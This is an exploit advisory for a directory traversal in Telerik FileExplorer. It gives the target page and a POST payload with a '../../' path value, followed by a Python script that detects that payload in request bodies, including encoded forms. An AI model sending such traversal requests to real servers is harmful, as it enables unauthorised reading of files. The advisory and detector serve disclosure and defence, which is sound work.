# Exploit Title: Telerik FileExplorer Directory Traversal
# Date: 12/11/2014
# Exploit Author: Kerz
# Vendor Homepage: www.telerik.com
# Software Link: http://www.telerik.com/products/aspnet-ajax.aspx
# Version: Q3 2014
# Tested on: Windows OS
# CVE: None
The malicious user sends a malformed request that causes file access in parent directories, as follows:
http://target_URL/FileExplorer.aspx
[POST Data]
&__CALLBACKPARAM -> "path":"../../"
Thanks
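
A defensive check for the request described above, as an added example that is not part of the original advisory: it scans a POST body for a `"path"` value in `__CALLBACKPARAM` that contains a `..` segment, including percent-encoded and double-encoded forms. It assumes a form-encoded body whose callback argument carries a `"path":"..."` pair as shown; the function names and sample bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Matches a "path":"<value>" pair anywhere inside the callback argument.
PATH_FIELD = re.compile(r'"path"\s*:\s*"((?:[^"\\]|\\.)*)"', re.IGNORECASE)

# Constructed sample POST bodies (not captured traffic).
SAMPLES = {
    "plain": "__VIEWSTATE=abc&__CALLBACKPARAM=%7B%22path%22%3A%22..%2F..%2F%22%7D",
    "double_encoded": "__CALLBACKPARAM=%7B%22path%22%3A%22%252e%252e%252f%22%7D",
    "benign": "__CALLBACKPARAM=%7B%22path%22%3A%22%2FDocs%2Freport..txt%22%7D",
}


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded dots and slashes are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_paths(post_body):
    """Return decoded "path" values in __CALLBACKPARAM that have a '..' segment."""
    hits = []
    fields = parse_qs(post_body, keep_blank_values=True)  # decodes one layer
    for raw in fields.get("__CALLBACKPARAM", []):
        for match in PATH_FIELD.finditer(raw):
            path = decode_fully(match.group(1))
            # Split on either separator; a name like "report..txt" is not a hit.
            if ".." in re.split(r"[\\/]+", path):
                hits.append(path)
    return hits


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, traversal_paths(body))
```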